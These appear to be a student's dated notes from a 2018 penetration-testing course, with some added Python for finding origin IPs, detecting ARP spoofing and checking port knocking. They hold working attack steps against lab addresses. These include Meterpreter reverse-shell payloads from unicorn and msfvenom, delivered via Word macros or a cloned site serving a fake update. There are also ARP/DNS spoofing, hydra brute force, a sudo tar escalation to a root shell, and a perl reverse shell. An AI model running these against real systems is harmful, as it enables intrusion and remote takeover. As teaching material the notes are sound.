25.06.2018, module Day 1

host? ip? mac?
protocol? a set of rules that defines how the communication works
applications: ftp, ssh, dns, snmp, ldap, http, https, rdp, pop, smtp, ntp
tcp? reliable, connection-oriented (not "secure": TCP by itself gives no confidentiality or integrity)
udp? known as the streaming protocol, connectionless
layered security - defence in depth
dns spoofing: redirect technique; arp spoofing & ssl strip technique
session hijacking: when the web server is not configured well; cookies and sessions
"big mac" attack or rogue AP -- WiFi Pineapple -- sold by Hak5, does MITM
thc -- thc.org, tools for rogue AP, hydra, thc-ssl-dos attacks
hell, dark web, 1337, zero day sites
defcon.org, tools that are used inside the conference
steganography: whitespace attack, snow, steghide
carbon black
kiosk mode (on Linux)
deception technology
pop, good for brute force
green threads
ntp:
promiscuous mode: allows a NIC to receive all traffic on the network segment, even if it is not addressed to this NIC (on a switched LAN only broadcast and flooded frames reach the NIC anyway, which is why a MITM needs ARP spoofing, see Day 10)
setoolkit: platform that has a tool to clone a website
nmap UDP scan: nmap -sU <target>
filename.py: import os ...   (script stub, left incomplete in the notes)
##########################################################################################
27.06.2018, module Day 2

github: search the GitHub database where devs and hackers fix a problem in their own way and share it with others; check for exploits, techniques, ideas on how others have fixed a problem
github account; git - connects via a URL

*unicorn*
# git clone https://github.com/trustedsec/unicorn.git   (URL taken from GitHub)
# cd unicorn/
# python unicorn.py --help
# python unicorn.py windows/meterpreter/reverse_tcp 172.16.60.84 4455   (generates powershell_attack.txt and unicorn.rc)
# msfconsole -r unicorn.rc   (starts the multi/handler listening on the chosen port)
copy-paste the code in powershell_attack.txt to the victim and run it from a PowerShell or cmd prompt on a Windows box. This code can and should be delivered with some imagination about how to get something executed,
e.g. # python -m SimpleHTTPServer 80   (serves that file; the victim fetches and runs it manually)
-----------------------------------------------------------------------------------------------------------------------------------------------------
*embedded macro*
root@kali:/cyber/macro# python unicorn.py windows/meterpreter/reverse_tcp 172.16.60.84 4455 macro
embed the code now in powershell_attack.txt into a Word macro, for example, and send it to the victim
# msfconsole -r unicorn.rc   (starts the multi/handler listening on the chosen port)
-----------------------------------------------------------------------------------------------------------------------------------------------------
*Empire*
root@kali:/PythonEmpire/Empire# pip install iptools      (if missing)
root@kali:/PythonEmpire/Empire# pip install netifaces    (if missing)
root@kali:/PythonEmpire/Empire/setup# ./install.sh
root@kali:/PythonEmpire/Empire# ./empire                 (opens the console)
(Empire) > listeners
(Empire: listeners) > uselistener http
(Empire: listeners/http) > info
(Empire: listeners/http) > set Host 172.16.60.84
(Empire: listeners/http) > execute
(Empire: listeners/http) > back
(Empire: listeners/http) > usestager   (generate a stager for the listener)

CVE (MITRE)

*Bloodhound*
root@kali:/cyber/# apt-get install bloodhound
# neo4j console     (to open the database)
root@kali:/cyber# pip install bloodhound

you could delete these folders, Sami:
C:\Program Files (x86)\WindowsPowerShell
C:\Program Files\WindowsPowerShell
C:\Windows\System32\WindowsPowerShell
C:\Windows\SysWOW64\WindowsPowerShell
or raise security so that arbitrary scripts cannot be run:
https://github.com/eapowertools/ReactivateUsers/wiki/Changing-Execution-Signing-Policy-in-Powershell
caveat: the execution policy is not a security boundary; it is bypassed per process with powershell -ExecutionPolicy Bypass, which is exactly what the unicorn one-liner above does, so it must not be the only control.
##########################################################################################
29.06.2018, module Day 3

iceberg, app sec, net sec, port knocking, security at the port level
initial process: 1. a sequence of port numbers, 2.
the port opens for a set time
Target: ICEBERG: 172.16.60.65   http://172.16.60.65/
chat()  logdata()
GET /s4bryfeyzUll4hu.log
cat s4bryfeyzUll4hu.log | grep "USER" | cut -d " " -f 28 | sort -u
user : c89udwh
pass : AwSg6UVrnk%SW==
##########################################################################################
02.07.2018, module Day 4

install a tftp server (see write-up)

*theHarvester*
git clone https://github.com/laramies/theHarvester.git   (to download)
cd theHarvester
python theHarvester.py -d ickosovo.com -b google
python theHarvester.py -d ickosovo.com -b google -l 400

*Metagoofil*
git clone https://github.com/laramies/metagoofil.git
cd metagoofil
python metagoofil.py -d apple.com -t doc,pdf -l 200 -n 50 -o applefiles -f results.html

*dnsrecon*   -d (domain)   -r (range)
dnsrecon -d teb-kos.com
dnsrecon -r 91.187.97.144/28

*dnscan*
cd dnscan
python dnscan.py -d teb-kos.com

bypass cloudflare (finding the origin IP):
- check old DNS databases (mafia cloud keeps the history from before the move to cloudflare)
- cpanel: ping it and it returns the real IP
- the admin leaks the host's own IP by mistake during setup
- brute force subdomains (a subdomain that is not proxied through cloudflare points straight at the origin)

*subdomain list*
git clone https://github.com/aboul3la/Sublist3r.git
cd Sublist3r
python sublist3r.py -d name.com -t 3 -e bing
python sublist3r.py -d name.com -t 3 -e google
python sublist3r.py -d name.com -t 3 -e yahoo

google dorks: site:"ickosovo" filetype:"jpeg" inurl:"index.php" intext:"rraci"   (the notes had file:, the Google operator is filetype:)
##########################################################################################
04.07.2018, module Day 5
##########################################################################################
06.07.2018, module Day 6

target: remote.com
find emails, domain, subdomains, IP addresses not behind cloud protection, etc.
python theHarvester.py -d remote.com -b bing -l 400   (the .py script must be downloaded beforehand)
theharvester -d remote.com -l 500 -b google
theharvester -d remote.com -l 500 -b all
dnsenum remote.com
dig remote.com
host remote.com
dnsrecon -d remote.com
bypass cloudflare, websploit
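The Cloudflare-bypass steps of Day 4 and Day 6 all end the same way: a pile of candidate IPs from historical DNS, subdomain brute forcing, cPanel and mail hosts, of which only the ones outside Cloudflare's published ranges can be the origin. The filter below is an added example and not part of the course notes or of any tool named above. The range list is a typed-in snapshot of https://www.cloudflare.com/ips-v4 and must be refreshed from that URL before real use; the records are constructed and the hostnames/IPs are documentation addresses.

```python
"""Filter candidate IPs for a Cloudflare-fronted domain down to origin candidates.
Added example; the Cloudflare ranges are a snapshot and must be refreshed."""
import ipaddress

# Snapshot of https://www.cloudflare.com/ips-v4 (assumption: re-fetch before use).
CLOUDFLARE_V4 = [ipaddress.ip_network(n) for n in (
    "173.245.48.0/20", "103.21.244.0/22", "103.22.200.0/22", "103.31.4.0/22",
    "141.101.64.0/18", "108.162.192.0/18", "190.93.240.0/20", "188.114.96.0/20",
    "197.234.240.0/22", "198.41.128.0/17", "162.158.0.0/15", "104.16.0.0/13",
    "104.24.0.0/14", "172.64.0.0/13", "131.0.72.0/22",
)]

# Constructed sample, shaped like what theHarvester/dnsrecon/Sublist3r plus a
# historical-DNS lookup would give you: (hostname, ip, where it came from).
SAMPLE_RECORDS = [
    ("www.example.com",    "104.16.12.34", "current A record"),
    ("www.example.com",    "198.51.100.7", "historical A record (2016)"),
    ("mail.example.com",   "198.51.100.7", "MX host"),
    ("cpanel.example.com", "198.51.100.9", "subdomain brute force"),
    ("ftp.example.com",    "172.67.1.1",   "current A record"),
    ("blog.example.com",   "N/A",          "tool output garbage"),
]


def is_cloudflare(ip: str) -> bool:
    """True if the address falls inside one of the published Cloudflare ranges."""
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in CLOUDFLARE_V4)


def origin_candidates(records):
    """Return (hostname, ip, source) for every record NOT fronted by Cloudflare,
    de-duplicated by IP (first source seen wins). Unparseable IPs are skipped."""
    seen = set()
    out = []
    for host, ip, source in records:
        try:
            if is_cloudflare(ip):
                continue
        except ValueError:
            continue  # "N/A" and similar noise from tool output
        if ip not in seen:
            seen.add(ip)
            out.append((host, ip, source))
    return out


if __name__ == "__main__":
    for host, ip, source in origin_candidates(SAMPLE_RECORDS):
        print(f"{ip:15}  {host:22}  via {source}")
```

Feed it the real output of the tools above and the survivors are the hosts to probe directly (for instance with curl and a Host: header for the target domain); an IP inside the list is the proxy, and hammering it only tells you about Cloudflare.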
##########################################################################################
09.07.2018, module4 Day 7

https://www.digitalocean.com/community   -- VPS solution
https://www.digitalocean.com/community/questions/how-to-config-port-knocking-on-csf-and-access-it-by-linux

**PORT KNOCKING**
https://download.configserver.com/csf.tgz
install knockd
cd /etc/csf/
nano csf.conf
TCP_IN = "22"                                   -- direct access only to 22
PORTKNOCKING = "80;TCP;30;1000;1001;1002;1003"  -- port 80 opens for 30 s after the knock sequence 1000,1001,1002,1003 (format: openport;proto;timeout;knock ports...)
csf -r                                          -- to restart
caveat: consecutive knock ports like 1000..1003 are hit in order by any sequential port scan, which opens the port for the scanner; pick non-adjacent ports.

*change the default port 22 to 65500*
vi /etc/apache2/ports.conf   80 -> 65500
service apache2 restart
(note: ports.conf is Apache's listener, so this moved the web port and not SSH's 22; sshd's port is the Port line in /etc/ssh/sshd_config)
*new port 65000 to be put behind port knocking*
##########################################################################################
11.07.2018, module4 Day 8

DNSENUM, DNSRECON, ARCHIVE.ORG, metagoofil, theharvester
whois ickosovo.com
info gathering report:
part1 - summary
part2 - info per tool and the info it extracted
part3 - conclusion
##########################################################################################
13.07.2018, module4 Day 9
missed
##########################################################################################
16.07.2018, module4 Day 10

https://www.hak5.org/
alfa network card
hsps
MITM - ARP spoofing
driftnet  -- tries to capture images from http links
dnsspoof  --
arpspoof  -- sends forged ARP replies (to act as the gateway)
ettercap  -- packet capture tool ??
urlsnarf  -- dumps the captured URLs
zANTI     -- to redirect requests
ARP?
sniffing, poisoning, vector of attack
------------------------------------------------------------------------------------------
**MITM man in the middle**
echo 1 > /proc/sys/net/ipv4/ip_forward   -- enable IP forwarding (/proc); without it the victim loses connectivity instead of being relayed
.60.79  win7 victim
.60.72  kali attacker machine
.60.1   original gateway
arpspoof -i eth0 -t 172.16.60.79 172.16.60.1   (tell the victim that we are the gateway)
arpspoof -i eth0 -t 172.16.60.1 172.16.60.79   (tell the gateway that we are the victim)
generate some traffic from the victim
ettercap -T -q -i eth0
------------------------------------------------------------------------------------------
**dnsspoofing**
nano host.txt
172.16.60.72 www*
172.16.60.72 ickosovo.com
arpspoof -i eth0 -t 172.16.60.79 172.16.60.1
arpspoof -i eth0 -t 172.16.60.1 172.16.60.79
dnsspoof -i eth0 -f host.txt
------------------------------------------------------------------------------------------
**clone a website using setoolkit**   (the clone is exported to /root/.set/web-clone)
move index.html to /var/www/html
in /var/www/html generate the malware .exe:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.16.60.72 LPORT=5560 -f exe -o test-update.exe
(LHOST is the attacker machine, .72 per the mapping above; the original notes had .79, which is the victim)
edit index.html -- add:
service apache2 start
http://<apache2 ip>/index.html   (the page opens and the file starts downloading)
##########################################################################################
18.07.2018, module4 Day 11

Stage 1: build the malware, upload it to the fake web, auto-download based on the OS
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=172.16.60.72 LPORT=5560 -f elf -o test-update.elf
msfvenom -p android/meterpreter/reverse_tcp LHOST=172.16.60.72 LPORT=5560 R > test-update.apk
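The two arpspoof commands in the Day 10 MITM above leave a signature on the wire: one MAC answering for two IPs, and the gateway IP answered for by two different MACs. The detector below is an added example (not from the notes, not arpspoof or ettercap code) that runs that check over a constructed list of ARP replies modelled on the lab (victim 172.16.60.79, attacker 172.16.60.72, gateway 172.16.60.1); the MAC addresses and timestamps are made up.

```python
"""ARP-poisoning detector over a list of observed ARP replies. Added example."""
from collections import defaultdict

# Constructed sample: (seconds, sender_ip, sender_mac) from ARP replies (opcode 2),
# as a sniffer on the segment would see them during the Day 10 attack.
SAMPLE_REPLIES = [
    (0.0, "172.16.60.1",  "00:11:22:33:44:01"),  # real gateway
    (0.5, "172.16.60.79", "00:11:22:33:44:79"),  # real victim
    (1.0, "172.16.60.72", "00:11:22:33:44:72"),  # attacker's own, legitimate reply
    (2.0, "172.16.60.1",  "00:11:22:33:44:72"),  # arpspoof -t .79 .1: attacker poses as gateway
    (2.0, "172.16.60.79", "00:11:22:33:44:72"),  # arpspoof -t .1 .79: attacker poses as victim
    (4.0, "172.16.60.1",  "00:11:22:33:44:72"),  # arpspoof keeps re-sending
]


def bindings(replies):
    """ip -> set of MACs that claimed it, and mac -> set of IPs it claimed."""
    ip_to_macs = defaultdict(set)
    mac_to_ips = defaultdict(set)
    for _, ip, mac in replies:
        ip_to_macs[ip].add(mac.lower())
        mac_to_ips[mac.lower()].add(ip)
    return ip_to_macs, mac_to_ips


def spoofed_ips(replies):
    """IPs answered for by more than one MAC: a poisoning in progress."""
    ip_to_macs, _ = bindings(replies)
    return {ip for ip, macs in ip_to_macs.items() if len(macs) > 1}


def detect_arp_spoof(replies, trusted=None):
    """Return alert strings. `trusted` maps ip -> mac for bindings known out of
    band (the gateway MAC from the DHCP server or the switch). Unknown IPs are
    baselined on first sight, which an attacker who is there first can abuse,
    so always seed the gateway."""
    known = {ip: mac.lower() for ip, mac in (trusted or {}).items()}
    alerts = []
    for t, ip, mac in replies:
        mac = mac.lower()
        if ip not in known:
            known[ip] = mac
        elif known[ip] != mac:
            alerts.append(f"t={t:.1f}s {ip} claimed by {mac}, expected {known[ip]}")
    _, mac_to_ips = bindings(replies)
    for mac, ips in sorted(mac_to_ips.items()):
        if len(ips) > 1:  # one NIC answering for several hosts: arpspoof in both directions
            alerts.append(f"{mac} answers for {len(ips)} IPs: {', '.join(sorted(ips))}")
    return alerts


if __name__ == "__main__":
    gateway = {"172.16.60.1": "00:11:22:33:44:01"}
    for line in detect_arp_spoof(SAMPLE_REPLIES, trusted=gateway):
        print(line)
```

On a real segment the tuples come from a sniffer (tcpdump -n arp, or a Scapy sniff callback reading pdst/hwsrc from reply packets); the same logic is what static ARP entries and switch Dynamic ARP Inspection enforce at the source.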
------------------------------------------------------------
msf set mitm
##########################################################################################
20.07.2018, module4 Day 12

target 1: 172.16.60.72   user: ick
target 2: 172.16.60.69, port knocking, ssh, knock sequence 1000 5000 9000

nmap -sV 172.16.60.69
PORT    STATE  SERVICE  VERSION
22/tcp  open   ssh      OpenSSH 7.5p1 Ubuntu 10 (Ubuntu Linux; protocol 2.0)
80/tcp  open   http     Apache httpd 2.4.27 ((Ubuntu))
MAC Address: 00:DB:DF:54:18:07 (Intel Corporate)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
--------
dirb http://172.16.60.72                                     -- directory brute force
hydra -l ick -P /root/Desktop/rockyou.txt 172.16.60.72 ssh   -- password brute force
sudo -u root tar cf /dev/null /temp/exploit --checkpoint=1 --checkpoint-action=exec=/bin/bash   -- gives root access when tar is allowed through sudo (the checkpoint action is run as root)

# nc -z 172.16.60.69 1000 5000 9000   (the knock; the notes had 100, the sequence above is 1000)
# ssh arben@172.16.60.69
arben@172.16.60.69's password: arben1!1
$ :)
next step: privilege escalation
$ sudo -l   -- found: (ALL) NOPASSWD: /usr/bin/perl
sudo -u root
root@kali:/# nc -lvp 80   -- opens a listening port on kali
$ sudo perl rv1.pl        -- perl reverse shell found on GitHub; edit in the IP of our machine and the port you are listening on with nc -lvp 80, e.g.
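The knock sequence is the same mechanism on both sides of this course: Day 7 configures it in csf.conf (PORTKNOCKING = "80;TCP;30;1000;1001;1002;1003") and Day 12 performs it with nc -z against 1000 5000 9000. The block below is an added example, not CSF, knockd or the notes' own code: a minimal server-side sequence matcher that parses the CSF-style string and replays a constructed stream of inbound SYNs, plus a client that does what the nc -z one-liner does. Assumptions: the timeout field is modelled as how long the port stays open after a completed sequence (CSF's and knockd's exact timing rules differ), and any knock on a port outside the sequence resets the attempt.

```python
"""Port-knocking sequence matcher and knock client. Added example."""
import socket
from dataclasses import dataclass, field


@dataclass
class KnockRule:
    open_port: int
    proto: str
    timeout: float            # seconds the port stays open after a full sequence (assumption)
    sequence: tuple
    progress: dict = field(default_factory=dict)   # src_ip -> index of the next expected knock
    opened: dict = field(default_factory=dict)     # src_ip -> time the sequence completed

    @classmethod
    def from_csf(cls, spec: str) -> "KnockRule":
        """Parse 'openport;proto;timeout;k1;k2;...' as written in csf.conf PORTKNOCKING."""
        parts = spec.split(";")
        return cls(int(parts[0]), parts[1].upper(), float(parts[2]),
                   tuple(int(p) for p in parts[3:]))

    def observe(self, t: float, src: str, dst_port: int) -> bool:
        """Feed one inbound SYN. Returns True when this knock completes the sequence."""
        expected = self.progress.get(src, 0)
        if dst_port == self.sequence[expected]:
            expected += 1
        elif dst_port == self.sequence[0]:
            expected = 1          # wrong knock, but it is a fresh start of the sequence
        else:
            expected = 0          # anything else resets the attempt
        if expected == len(self.sequence):
            self.opened[src] = t
            self.progress[src] = 0
            return True
        self.progress[src] = expected
        return False

    def is_open(self, t: float, src: str) -> bool:
        """Would a packet from `src` to open_port be accepted at time t?"""
        opened = self.opened.get(src)
        return opened is not None and t - opened <= self.timeout


def knock(host: str, ports, send=None):
    """Client side of `nc -z host p1 p2 p3`: one TCP connect attempt per port, in order.
    `send(host, port)` is injectable so the sequence can be checked without a network."""
    def default_send(h, p):
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.settimeout(0.5)
        try:
            s.connect((h, p))      # refused or timed out is expected; the SYN is the knock
        except OSError:
            pass
        finally:
            s.close()
    send = send or default_send
    sent = []
    for p in ports:
        send(host, p)
        sent.append(p)
    return sent


# Constructed SYN stream: (seconds, source ip, destination port) as a firewall
# or knockd would log it. Note the sequential scanner on the Day 7 rule.
SAMPLE_SYNS = [(0, "10.0.0.5", 1000), (1, "10.0.0.5", 1001),
               (2, "10.0.0.5", 1002), (3, "10.0.0.5", 1003)]

if __name__ == "__main__":
    rule = KnockRule.from_csf("80;TCP;30;1000;1001;1002;1003")
    for t, src, port in SAMPLE_SYNS:
        if rule.observe(t, src, port):
            print(f"t={t}: {src} completed the knock, port {rule.open_port} open")
    print("sequential scan opens it:",
          any(rule.observe(i, "scanner", p) for i, p in enumerate(range(1, 1100))))
```

The last line of the demo is the point of the Day 7 caveat: because 1000,1001,1002,1003 are consecutive, a plain ascending port scan completes the sequence with nothing in between to reset it, while the Day 12 style 1000,5000,9000 is reset by the first port after 1000. Port knocking also does nothing against an attacker who sniffs the knock on the path, so it is an obscurity layer in front of SSH, not a replacement for key-only authentication.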